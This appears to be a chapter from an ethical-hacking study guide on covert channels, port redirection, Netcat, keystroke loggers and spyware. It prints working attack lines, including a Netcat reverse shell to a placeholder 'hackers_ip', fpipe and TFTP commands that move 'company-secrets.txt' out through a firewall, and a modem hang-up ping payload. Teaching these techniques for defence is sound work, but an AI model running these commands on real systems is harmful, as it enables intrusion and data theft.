Covert Communications

Objective:

Understand covert communications

If you look at the history of covert communications, you will see that The Trusted Computer System Evaluation Criteria (TCSEC) was one of the first documents to fully examine the concept of covert communications and attacks. TCSEC divides covert channel attacks into two broad categories, including

It is important to examine covert communications on a more focused scale because it will be examined here as a means of secretly passing information or data. As an example, most everyone has seen a movie in which an informant signals the police; it's time to bust the criminals. It could be that the informant lights a cigarette or simply tilts his hat. These small signals are meaningless to the average person who might be nearby, but for those who know what to look for, they are recognized as a legitimate signal.

In the world of hacking, covert communication is accomplished through a covert channel. A covert channel is a way of moving information through a communication channel or protocol in a manner in which it was not intended to be used. Covert channels are important for security professionals to understand. For the ethical hacker who performs attack and penetration assessments, such tools are important because hackers can use them to obtain an initial foothold into an otherwise secure network. For the network administrator, understanding how these tools work and their fingerprints can help them recognize potential entry points into the network. For the hacker, it's a powerful tool that can potentially allow him control and access.

How do covert communications work? Well, the design of TCP/IP offers many opportunities for misuse. The primary protocols for covert communications can include Internet Protocol (IP), TCP, UDP, and ICMP. To get a better understanding of how covert communication works, let's take a look at one of these protocols, ICMP.

ICMP is specified by RFC 792 and is designed to provide error messaging, best path information, and diagnostic messages. One example of this is the ping command. It uses ICMP to test an Internet connection. Figure 6.3 details the packet format of the ICMP header.

Figure 6.3. ICMP header.

As you can see in Figure 6.3, the fields of the ping packet include

Did you notice the comments about the last field, optional data? What's transported there depends on the system. Linux fills the optional data area with numeric values by counting up, whereas a Windows system progresses through the alphabet. The optional data field was actually designed just to be filler. It helps meet the minimum packet size needed to be a legal packet. It's sort of like those Styrofoam peanuts in a shipping box, as it's just there to take up space.

Let's take a look at some basic ways that ping can be manipulated before discussing specific covert communication tools. The Linux ping command includes the "-p" option, which allows the user to specify the optional data. Therefore, a user could enter just about anything he wanted into the field. For this example, the following ASCII string is used:

[root@localhost root]# ping -p 2b2b2b415448300 192.168.123.101

Take a look at Figure 6.4 to see what the actual packet looks like when captured with the sniffer program.

Figure 6.4. Linux ping capture.

Look closely at the ASCII part of the capture in the lower right side of Figure 6.4. Some of you might even remember this command from the good old days of modems. +++ATH0 is the value embedded into the ping packet; its ASCII equivalent is 2b2b2b415448300. Although this is actually an old modem hang-up string attack, it serves as a good example of how a protocol such as ping can be misused. For someone using a modem, this could be used for a DoS that forces the victim to respond with the string +++ATH0. Even though the hangup string is within the IP datagram, the modem sees it and disconnects the connection.

ICMP is not the only protocol that can be used for covert communications. Hackers can use the options field in the IP header, the options field in the TCP header, or even a TCP ACK. TCP ACK is such a juicy target because of the way in which many firewalls handle it. Networks are vulnerable to TCP ACK attacks if a packet filter is used. To get some idea how this can occur, let's review some basics of TCP. By design, TCP is a connection-orientated protocol that provides robust communication. The following steps outline the process:

1.

A three-step handshakeAssures that both systems are ready to communicate.

 

2.

Exchange of control informationDuring the setup, information is exchanged that specifies maximum segment size.

 

3.

Sequence numbersIndicates the amount and position of data being sent.

 

4.

AcknowledgementsIndicates the next byte of data that is expected.

 

5.

Four-step shutdownA formal process of ending the session that allows for an orderly shutdown.

 

Sequence numbers indicate the amount and position of data, although acknowledgments confirm that data was received. A visual representation of this is shown in Figure 6.5.

Figure 6.5. TCP ACK process.

Although SYN packets occur only at the beginning of the session, ACKs might occur thousands of times. That is why packet filtering devices build their rules on SYN segments. It's an assumption on the firewall administrator's part that ACKs only occur as part of an established session. It's much easier to configure and reduces workload. To bypass the SYN blocking rule, a hacker might attempt to use TCP ACK as a covert communication channel. Social engineering, trickery, or a malicious email can be used to launch a program inside the network and create a customized tunnel. Tools such as ACKCMD serve this exact purpose and embed data inside the TCP ACK packet. Stateless firewalls would not catch this, and the traffic would go undetected.

Downstream Liability

This "in the field" segment was contributed by Jim Cowden. Jim's company, Control Point has many clients who utilize his security services. One such corporate client was surprised to note that their bandwidth was heavily used. After scrutinizing their reports and asking them some questions about their normal way of doing business, Control Point decided to involve the client's ISP in the conversation. The ISP's usage reports showed a six month history that pinpointed a dramatic increase in the client's usage starting in April of that year, to the present (early July).

Using usage reports and the employee records, the source could be pinpointed. The high usage period coincided with a certain intern's term. The intern was performing day-long movie and music downloads from a free P2P sharing service. The client's IT staff also found that a great deal of server space had been used to house the downloads, and company-owned equipment was used to reproduce and distribute the downloads. The difficulty in initially finding this traffic was that the intern was using HTTP tunneling. Even though specific peer-to-peer ports were blocked, tunneling defeated this control by disguising the forbidden traffic as ordinary web browsing material. After all, most companies allow HTTP to travel unmolested through their firewalls.

The moral of this story is that you must be proactive. Until you start monitoring your network, you cannot possibly know what constitutes normal or abnormal activity. Depending on local law and federal regulations, companies could be held liable for what is done on their systems. If a company takes no action to disallow through policy or restrict the activity of its users on the system, its inherent risk of liability and misuse increases.

Control Point provides managed and project-based INFOSEC services to corporate, government, and state clients.

 

Covert Communication Tools

Objective:

Explain port redirection

With some background out of the way about how covert communication works and how a tool such as ping can be misused for covert communications, we can focus on tools designed for making covert communications easy.

Port Redirection

For a packet to reach it destination, it must have an IP address and a port number. Ports range from 065535. Most applications use well-known ports. For example, DNS uses 53, whereas HTTP uses 80. Most security administrators worth their salt will block ports that are not required at the firewall. The most common way for hackers to deal with this is by using port redirection. Port redirection works by listening on certain ports and then forwarding the packets to a secondary target. Some of the tools used for port redirection include datapipe, fpipe, and Netcat. What is great about all three of these tools is that they are protocol ignorant. They don't care what you pass; port redirectors simply act as the pipe to more data from point A to point B.

Datapipe is a UNIX port redirection tool. The syntax to use datapipe is straightforward:

datapipe

As an example, let's say that the hacker has compromised a Linux host 10.2.2.254 on the inside of the network and has uploaded the datapipe application. Now, the hacker would like to set up a null session to Windows systems (10.2.2.2) inside the compromised network. The problem is that the firewall is blocking port 139. Therefore, there is no direct way for the hacker to set up a null session. That's where datapipe come in. From the compromised Linux system, the hacker would run the following command:

Datapipe 80 139 10.2.2.2

On the hacker's local Linux system, he would enter

Datapipe 139 80 10.2.2.254

To review what has happened here, the compromised Linux system was instructed to take traffic coming from the Windows system we want to attack and use port redirection to move port 139 traffic over to port 80. After the traffic is on port 80, it can easily be moved through the corporate firewall. On the hacker's local system, datapipe was instructed to take traffic on port 80 and use port redirection to move it back over to 139. At this point, a null session can be set up using the traffic being redirected out of the firewall.

Fpipe is a similar tool that was developed by Foundstone. It performs port redirection on Windows systems. Again, this tool allows hackers to bypass firewall restrictions. Those who remember Nimda probably know that one of the things it did was to use TFTP to upload the infected file to the web server it was attempting to infect. Because of this, hopefully most administrators have blocked outbound TFTP access. For the hacker who gets fpipe loaded on a compromised system, blocking port 69 will probably not keep him from using the service. Observe the following two commands:

C:>fpipe -l 69 -r 53 -u 10.2.2.2 C:>tftp -i localhost PUT company-secrets.txt

If the hacker has a TFTP server running outside the compromised network at 10.2.2.2, the two preceding commands will allow the hacker to move the company-secrets.txt document through the victim's firewall. -l 69 means listen on port 69; -r is the remote port the traffic is redirected to; -u stands for UDP; and the IP address is the address of the hacker's system to which the victim is redirecting.

Netcat is a command-line utility written for UNIX and Windows. Netcat can build and use TCP and UDP connections. It is useful for port redirection as well as numerous other tasks. It reads and writes data over those connections until they are closed. Table 6.2 shows common Netcat switches.

Table 6.2. Common Netcat Switches

Netcat Switch

Purpose

Nc -d

Used to detach Netcat from the console

Nc -l -p [port]

Used to create a simple listening TCP port; adding -u will place it into UDP mode

Nc -e [program]

Used to redirect stdin/stdout from a program

Nc -w [timeout]

Used to set a timeout before Netcat automatically quits

Program | nc

Used to pipe output of program to Netcat

Nc | program

Used to pipe output of Netcat to program

Nc -h

Used to display help options

Nc -v

Used to put Netcat into verbose mode

Nc -g or nc -G

Used to specify source routing flags

Nc -t

Used for Telnet negotiation

Nc -o [file]

Used to hex dump traffic to file

Nc -z

Used for port scanning

If Netcat is available on the victim's system, it can be used similar to datapipe and fpipe, shown previously. You can actually shovel the shell directly back to the hacker system. First, the hacker would need to set up a listener on his system, as follows:

nc -n -v -l -p 80

Next, the hacker would enter the following command from the victim's system:

nc -n hackers_ip 80 -e "cmd.exe "

After being entered, this would shovel the shell for the victim's system to the hacker's open command prompt. Netcat can be used for many other purposes such as port scanning and uploading files. To port scan

nc -v -z -w1 IPaddress 1-1024

This command would port scan the target IP address. The -v option means verbose; -z is used for port scanning; -w1 means wait one second before timing out; and 1-1024 is the range of TCP ports to be scanned.

Other Redirection and Covert Tools

A host of other covert communication tools are available. No matter which tool the hacker uses, the key is to not be detected. The ability to exploit a system is greatly reduced after its owners know that something is wrong. The following tools can use ICMP, TCP, or even IGRP:

Review Break

There are different types of Trojans. The following list summarizes the different types that have been discussed so far.

Name

Category

Attributes

NetBus

Remote control

Windows attack tool

SubSeven

Remote control

Windows attack tool

Loki

Covert channel

Linux attack tool

Firewall Killer 2000

Destructive

Windows attack tools

Beast

Remote control

DLL injection technology

ACKCMD

Covert channel

Uses TCP ACKs

Netcat

Backdoor

Linux and Windows friendly

Datapipe

Port redirection

Redirection tool for Linux

Fpipe

Port redirection

Redirection tool for Windows

 

Keystroke Logging

Objective:

Discuss the dangers of keystroke loggers

Keystroke loggers are software or hardware devices used to record everything a person types. Some of these programs can record every time a mouse is clicked, a website is visited, and a program is opened. Although not truly a covert communication tool, these devices do give a hacker the ability to covertly monitor everything a user does. Some of these devices secretly email all the amassed information to a predefined email address set up by the hacker.

The software version of this device is basically a shim, as it sets between the operating system and the keyboard. The hacker might send a victim a keystroke logging program wrapped up in much the same way as a Trojan would be delivered. Once installed, the logger can operate in stealth mode, which means that they are hard to detect unless you know what you are looking for.

There are ways to make keystroke loggers completely invisible to the OS and to those examining the file system. To accomplish this, all the hacker has to do is use a hardware keystroke logger. These devices are usually installed while the user is away from his desk. Hardware keystroke loggers are completely undetectable except for their physical presence. Even then, they might be overlooked, as they resemble an extension. Not many people pay close attention to the plugs on the back of their computer.

Note

Employers who plan to use keystroke loggers should legally make sure that company policy outlines their use and how employees are to be informed. Computer Emergency Response Team (CERT) recommends a warning banner similar to the following: "This system is for the use of authorized users only. Individuals using this computer system without authority, or in excess of their authority, are subject to having all of their activities on this system monitored and recorded by security personnel."

 

Hardware

Keystroke recorders have been around for years. One such example is a commercial device that is openly available worldwide from a New Zealand firm that goes by the name of Keyghost Company (http://www.keyghost.com). The device looks like a small adaptor on the cable connecting one's keyboard to the computer. This device requires no external power, lasts indefinitely, and cannot be detected by any software.

Software

Numerous software products that record all keystrokes are openly available on the Internet. You have to pay for some products, but others are free. Some of the keystroke recorders include

Spyware

Spyware is another form of malicious code that is similar to a Trojan. It is installed without your consent or knowledge, hidden from view, monitors your computer and Internet usage, and is configured to run in the background each time the computer starts. Spyware is typically used for one of two purposes, surveillance or advertising:

Many times, spyware sites and vendors use droppers to covertly drop their spyware components to the victim's computer. Basically a dropper is just another name for a wrapper because a dropper is just a standalone program that drops different types of standalone malware to a system. Spyware has grown to be a big problem.

To get a better idea of how big of a problem this has become, the Pew Group performed a survey which discovered that more than 40 percent of those polled have had serious problems with spyware during the last year. It's also been reported that an increase in the numbers of computers being donated are infected with spyware. The former owners of these computers were noted to have said that it was cheaper to get a new system than to pay to have the infected systems repaired.

Spyware programs are similar to Trojans in that there are many ways to become infected. To force the spyware to restart each time the system boots, code is usually hidden in the registry run keys, the Windows Startup folder, the Windows load= or run= lines found in the Win.ini file, or the Shell= line found in the Windows System.ini. If you are dealing with systems that have had spyware installed, start by looking in the locations discussed previously or use a spy-ware removal program. It's good practice to use more than one anti-spyware program to find and remove as much spyware as possible. Well-known anti-spyware programs include

Trojan and Backdoor Countermeasures

Категории